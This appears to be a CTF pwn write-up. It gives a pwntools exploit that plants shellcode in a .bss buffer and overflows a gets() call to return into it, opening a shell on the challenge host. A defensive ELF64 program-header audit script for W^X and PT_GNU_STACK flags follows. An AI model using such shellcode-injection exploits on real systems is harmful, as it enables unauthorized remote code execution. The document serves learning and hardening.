name is a global variable located in the .bss segment.
The program reads input with gets(), which can be overflowed.
from pwn import *
r = remote('node3.buuoj.cn', 27785)
context(arch='amd64', os='linux')  # set the target architecture and OS
shellcode = asm(shellcraft.sh())  # generate shellcode that invokes /bin/sh
r.sendlineafter(b'tell me your name', shellcode)  # write the shellcode into name
payload = b'a' * 0x28 + p64(0x601080)  # padding, then the address of name as the new return address
r.sendlineafter(b'What do you want to say to me?', payload)
r.interactive()
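
The return address is pointed at name (0x601080), so the shellcode only runs if that .bss page ends up executable. As an added example (not part of the original writeup), the following audits ELF64 program headers for the flags that permit this; the function names and both sample images are constructed here for illustration.

```python
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W = 1, 2
NAME_ADDR = 0x601080  # address of name, taken from the writeup

def program_headers(elf):
    """Yield (p_type, p_flags, p_vaddr, p_memsz) from a little-endian ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        f = struct.unpack_from("<IIQQQQQQ", elf, e_phoff + i * e_phentsize)
        yield f[0], f[1], f[3], f[6]

def audit_address(elf, addr):
    """Return the W^X findings that affect data stored at addr."""
    findings, stack_seen = [], False
    for p_type, flags, vaddr, memsz in program_headers(elf):
        if p_type == PT_LOAD and vaddr <= addr < vaddr + memsz:
            if flags & PF_W and flags & PF_X:
                findings.append("segment is writable and executable")
        elif p_type == PT_GNU_STACK:
            stack_seen = True
            # On older x86-64 Linux kernels this request also enables
            # READ_IMPLIES_EXEC, so readable data pages become executable.
            if flags & PF_X:
                findings.append("PT_GNU_STACK requests an executable stack")
    if not stack_seen:
        findings.append("PT_GNU_STACK missing")
    return findings

def build_elf(segments):
    """Constructed image: ELF64 header plus program headers, no section data."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    hdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0x400000, 64, 0, 0,
                              64, 56, len(segments), 0, 0, 0)
    return hdr + b"".join(struct.pack("<IIQQQQQQ", t, f, 0, va, va, sz, sz, 0x1000)
                          for t, f, va, sz in segments)

# Constructed samples: same layout, differing only in the PT_GNU_STACK flags.
TEXT, DATA = (PT_LOAD, 5, 0x400000, 0x1000), (PT_LOAD, 6, 0x601000, 0x1000)
WEAK = build_elf([TEXT, DATA, (PT_GNU_STACK, 7, 0, 0)])
HARDENED = build_elf([TEXT, DATA, (PT_GNU_STACK, 6, 0, 0)])

if __name__ == "__main__":
    for label, image in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_address(image, NAME_ADDR) or "no findings")
```

Linking with a non-executable stack (`-z noexecstack`) clears the PT_GNU_STACK finding, after which a jump into .bss faults instead of executing.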